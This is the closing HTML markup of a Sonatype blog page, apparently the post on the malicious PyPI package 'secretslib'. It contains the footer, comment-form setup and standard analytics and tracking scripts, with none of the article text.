</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-21 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-rich_text sonatype-legal" style="" data-widget-type="rich_text" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_145688299026719" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="rich_text"><p class="footer-copyright">Sonatype Headquarters -&nbsp;8161 Maple Lawn Blvd #250, Fulton, MD 20759</p>
<p class="footer-copyright">Tysons Office - 8281 Greensboro Drive – Suite 630, McLean, VA 22102</p>
<p class="footer-copyright">Australia Office - 60 Martin Place Level 1, Sydney, NSW 2000, Australia</p>
<p class="footer-copyright">London Office -168 Shoreditch High Street, E1 6HU London</p>
<p class="footer-copyright" style="margin-top: 20px;">Copyright&nbsp;© 2008-present, Sonatype Inc. All rights reserved. Includes the third-party code listed here. Sonatype and Sonatype Nexus are trademarks of Sonatype, Inc. Apache Maven and Maven are trademarks of the Apache Software Foundation. M2Eclipse is a trademark of the Eclipse Foundation. All other trademarks are the property of their respective owners.</p>
<p class="footer-terms"><a href="//www.sonatype.com/terms-of-service" target="_blank" rel="noopener">Terms of Service</a> &nbsp; &nbsp;<a href="//www.sonatype.com/privacy-policy" target="_blank" rel="noopener">Privacy Policy</a> &nbsp; &nbsp;<a href="https://www.sonatype.com/hubfs/legal/Modern-Slavery-and-Human-Trafficking-Statement.pdf" target="_blank" rel="noopener">Modern Slavery Statement</a> &nbsp; &nbsp;<a href="https://www.sonatype.com/events-terms-and-conditions" target="_blank" rel="noopener">Event Terms and Conditions</a>&nbsp; &nbsp;<a href="https://www.requesteasy.com/5ee2-5766" target="_blank" rel="noopener">Do Not Sell My Personal Information</a></p>
<script id="Cookiebot" src="https://consent.cookiebot.com/uc.js" data-cbid="9958dd21-8504-4dbf-8e2f-e736792a6843" type="text/javascript" async></script></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->
</div>
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-raw_jinja " style="display:none;" data-widget-type="raw_jinja" data-x="0" data-w="12">

<script>
    $('#blog_search_form').submit(function() {
        var url = "https://blog.sonatype.com/miracle/all";
        var searchTerm = $('#keyword').val().toLowerCase();
        var goUrl = url + '?q=' + searchTerm;
        window.location = goUrl;
        return false;
        
    });
</script>

<script>

    $(function(){

        $(".tab-pane").not(".active").hide();
        $('.tabber-content .tab-pane').each(function(i,el){
        $(el).attr("id","tab-"+i);});
        $(".tabber-tabs a").each(function(i,el){
        $(el).attr("href","#tab-"+i);
        var ID=$(el).attr("href");
        $(this).click(function(e){
        e.preventDefault();
        if(!$(this).parent().hasClass("active")){
            $(this).parent().addClass("active").siblings().removeClass("active");
        $(ID).fadeIn().siblings().hide();}});});
    });

</script></div><!--end widget-span -->

</div><!--end row-->
</div><!--end row-wrapper -->

    </div><!--end footer -->
</div><!--end footer wrapper -->

    
<script>
(function () {
    window.addEventListener('load', function () {
        setTimeout(function () {
            var xhr = new XMLHttpRequest();
            xhr.open('POST', '/_hcms/perf', true /*async*/);
            xhr.setRequestHeader("Content-type", "application/json");
            xhr.onreadystatechange = function () {
                // do nothing.
            };
            var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
            function populateNetworkInfo(name, connection, info) {
                if (name in connection) {
                    info[name] = connection[name];
                }
            }
            var networkInfo = {};
            if (connection) {
                ['type', 'effectiveType', 'downlink', 'rtt'].forEach(function(name) {
                    populateNetworkInfo(name, connection, networkInfo);
                });
            }
            var perfData = {
                url: location.href,
                portal: 1958393,
                content: 81600643666,
                group: -1,
                connection: networkInfo,
                timing: performance.timing
            };
            xhr.send(JSON.stringify(perfData));
        }, 3000);  // Execute this 3 seconds after onload.
    });
})();
</script>

<script src="/hs/hsstatic/keyboard-accessible-menu-flyouts/static-1.17/bundles/project.js"></script>
<script>
var hsVars = hsVars || {}; hsVars['language'] = 'en-us';
</script>

<script src="/hs/hsstatic/cos-i18n/static-1.53/bundles/project.js"></script>
<script src="https://blog.sonatype.com/hs-fs/hub/1958393/hub_generated/module_assets/40666130714/1647369888928/module_40666130714_MEGA_Menu_Code_Jan_2021_NEW_MEGA.min.js"></script>
<script src="/hs/hsstatic/AsyncSupport/static-1.122/js/comment_listing_asset.js"></script>
<script>
  function hsOnReadyPopulateCommentsFeed() {
    var options = {
      commentsUrl: "https://api-na1.hubapi.com/comments/v3/comments/thread/public?portalId=1958393&offset=0&limit=1000&contentId=81600643666&collectionId=3737438004",
      maxThreadDepth: 3,
      showForm: true,
      
      skipAssociateContactReason: 'blogComment',
      disableContactPromotion: true,
      
      target: "hs_form_target_57d70dc2-fdae-4a95-864a-471335c8677b"
    };
    window.hsPopulateCommentsFeed(options);
  }

  if (document.readyState === "complete" ||
      (document.readyState !== "loading" && !document.documentElement.doScroll)
  ) {
    hsOnReadyPopulateCommentsFeed();
  } else {
    document.addEventListener("DOMContentLoaded", hsOnReadyPopulateCommentsFeed);
  }

</script>


          <!--[if lte IE 8]>
          <script charset="utf-8" src="https://js.hsforms.net/forms/v2-legacy.js"></script>
          <![endif]-->
      
<script data-hs-allowed="true" src="/_hcms/forms/v2.js"></script>

        <script data-hs-allowed="true">
            hbspt.forms.create({
                portalId: '1958393',
                formId: '57d70dc2-fdae-4a95-864a-471335c8677b',
                pageId: '81600643666',
                region: 'na1',
                pageName: "PyPI Package 'secretslib' Drops Fileless Linux Malware to Mine Monero",
                contentType: 'blog-post',
                
                formsBaseUrl: '/_hcms/forms/',
                
                
                
                css: '',
                target: "#hs_form_target_57d70dc2-fdae-4a95-864a-471335c8677b",
                type: 'BLOG_COMMENT',
                
                submitButtonClass: 'hs-button primary',
                formInstanceId: '1',
                getExtraMetaDataBeforeSubmit: window.hsPopulateCommentFormGetExtraMetaDataBeforeSubmit
            });

            window.addEventListener('message', function(event) {
              var origin = event.origin; var data = event.data;
              if ((origin != null && (origin === 'null' || document.location.href.toLowerCase().indexOf(origin.toLowerCase()) === 0)) && data !== null && data.type === 'hsFormCallback' && data.id == '57d70dc2-fdae-4a95-864a-471335c8677b') {
                if (data.eventName === 'onFormReady') {
                  window.hsPopulateCommentFormOnFormReady({
                    successMessage: "Thanks for your comment",
                    target: "#hs_form_target_57d70dc2-fdae-4a95-864a-471335c8677b"
                  });
                } else if (data.eventName === 'onFormSubmitted') {
                  window.hsPopulateCommentFormOnFormSubmitted();
                }
              }
            });
        </script>
      

<!-- Start of HubSpot Analytics Code -->
<script type="text/javascript">
var _hsq = _hsq || [];
_hsq.push(["setContentType", "blog-post"]);
_hsq.push(["setCanonicalUrl", "https:\/\/blog.sonatype.com\/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero"]);
_hsq.push(["setPageId", "81600643666"]);
_hsq.push(["setContentMetadata", {
    "contentPageId": 81600643666,
    "legacyPageId": "81600643666",
    "contentFolderId": null,
    "contentGroupId": 3737438004,
    "abTestId": null,
    "languageVariantId": 81600643666,
    "languageCode": "en-us",
    
}]);
</script>

<script type="text/javascript" id="hs-script-loader" async defer src="/hs/scriptloader/1958393.js?businessUnitId=0"></script>
<!-- End of HubSpot Analytics Code -->


<script type="text/javascript">
var hsVars = {
    ticks: 1660743253175,
    page_id: 81600643666,
    
    content_group_id: 3737438004,
    portal_id: 1958393,
    app_hs_base_url: "https://app.hubspot.com",
    cp_hs_base_url: "https://cp.hubspot.com",
    language: "en-us",
    analytics_page_type: "blog-post",
    analytics_page_id: "81600643666",
    category_id: 3,
    folder_id: 0,
    is_hubspot_user: false
}
</script>


<script defer src="/hs/hsstatic/HubspotToolsMenu/static-1.138/js/index.js"></script>

<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TT8R4P" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-1693297-38', 'auto','sonatypeDemandbaseTracker02012017');
ga('sonatypeDemandbaseTracker02012017.send', 'pageview');

  ga('create', 'UA-1693297-29', 'auto','cdt');
  ga('cdt.send', 'pageview');
  
</script>
 
<script type="text/javascript" language="javascript"> 
      var sf14gv = 29592; 
      (function() { 
      var sf14g = document.createElement('script'); sf14g.type = 'text/javascript'; sf14g.async = true; 
      sf14g.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 't.sf14g.com/sf14g.js'; 
      var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sf14g, s); 
      })(); 
</script>

<!-- Twitter universal website tag code -->
<script>
!function(e,n,u,a){e.twq||(a=e.twq=function(){a.exe?a.exe.apply(a,arguments):
a.queue.push(arguments);},a.version='1',a.queue=[],t=n.createElement(u),
t.async=!0,t.src='//static.ads-twitter.com/uwt.js',s=n.getElementsByTagName(u)[0],
s.parentNode.insertBefore(t,s))}(window,document,'script');
// Insert Twitter Pixel ID and Standard Event data below
twq('init','nv7ri');
twq('track','PageView');
</script>
<!-- End Twitter universal website tag code -->
<!-- Start DemandBase website tag code--> 
<script>
(function(d,b,a,s,e){var t=b.createElement(a),
 fs=b.getElementsByTagName(a)[0];t.async=1;t.id=e;t.src=s;
 fs.parentNode.insertBefore(t,fs);})
(window,document,'script','https://tag.demandbase.com/eUSOivES.min.js','demandbase_js_lib');
</script>
<!-- Start DemandBase website tag code -->


<script type="text/javascript">
_linkedin_data_partner_id = "39209";
</script><script type="text/javascript">
(function(){var s = document.getElementsByTagName("script")[0];
var b = document.createElement("script");
b.type = "text/javascript";b.async = true;
b.src = "https://snap.licdn.com/li.lms-analytics/insight.min.js";
s.parentNode.insertBefore(b, s);})();
</script>
<!-- Twitter universal website tag code -->
<script>
!function(e,t,n,s,u,a){e.twq||(s=e.twq=function(){s.exe?s.exe.apply(s,arguments):s.queue.push(arguments);
},s.version='1.1',s.queue=[],u=t.createElement(n),u.async=!0,u.src='//static.ads-twitter.com/uwt.js',
a=t.getElementsByTagName(n)[0],a.parentNode.insertBefore(u,a))}(window,document,'script');
// Insert Twitter Pixel ID and Standard Event data below
twq('init','nv7ri');
twq('track','PageView');
</script>
<!-- End Twitter universal website tag code -->
<!-- Mobile Navigation Script -->
<script src="https://blog.sonatype.com/hs-fs/hub/1958393/hub_generated/template_assets/5296077409/1623972639539/ARCHIVES_NOT_IN_USE/NOT_IN_USE_CSS_JS_and_MISC/Sonatype-Main.js">
</script>

<div id="fb-root"></div>
 <script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&status=0";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
 <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="https://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
 


    
    <!-- Generated by the HubSpot Template Builder - template version 1.03 -->

</body></html>